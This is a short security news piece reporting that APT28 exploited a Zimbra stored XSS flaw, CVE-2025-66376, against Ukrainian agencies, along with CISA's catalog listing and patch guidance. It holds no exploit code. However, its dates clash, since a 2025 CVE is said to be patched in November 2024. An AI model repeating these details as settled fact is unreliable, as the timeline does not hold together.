A Russian state-backed hacking group, APT28, has been actively exploiting a critical vulnerability in Zimbra Collaboration Suite (ZCS) to target Ukrainian government entities. The flaw, tracked as CVE-2025-66376, is a high-severity stored cross-site scripting (XSS) vulnerability that allows unauthenticated attackers to achieve remote code execution (RCE). This enables them to fully compromise the Zimbra email server and gain access to the target's email accounts. The vulnerability was patched by Zimbra in early November 2024, but its active exploitation underscores the persistent threat to unpatched systems, particularly in high-value geopolitical contexts.
The Cybersecurity and Infrastructure Security Agency (CISA) formally added CVE-2025-66376 to its Known Exploited Vulnerabilities (KEV) catalog, confirming its active use in attacks. Under Binding Operational Directive (BOD) 22-01, CISA has mandated all Federal Civilian Executive Branch (FCEB) agencies to apply the necessary patches and secure their systems against this flaw within two weeks. This directive highlights the severity of the threat, extending concern beyond the immediate Ukrainian targets to U.S. federal infrastructure. While CISA did not attribute the attacks, security researchers from Seqrite Labs reported that APT28—a group linked to Russia's GRU military intelligence—was behind the exploitation campaign.
One confirmed victim of this campaign is the Ukrainian State Hydrology Agency, a critical infrastructure entity under the Ministry of Infrastructure responsible for navigational, maritime, and hydrographic support. The compromise of such an agency demonstrates APT28's continued focus on disrupting and espionage against Ukrainian critical infrastructure amid the ongoing conflict. The use of a vulnerability in a widely deployed collaboration platform like Zimbra is a classic tactic, allowing threat actors to gain a foothold in networks through a common enterprise tool.
Organizations, especially those in government and critical infrastructure sectors, must treat this alert with high priority. Immediate action is required to apply the Zimbra security updates released in November 2024. Beyond patching, security teams should review logs for signs of exploitation, monitor for suspicious email activity, and ensure robust segmentation to limit lateral movement. This incident is a stark reminder that patching cadence is a critical component of cyber defense, and delays can be directly exploited by advanced persistent threat actors to conduct espionage and disruptive operations.
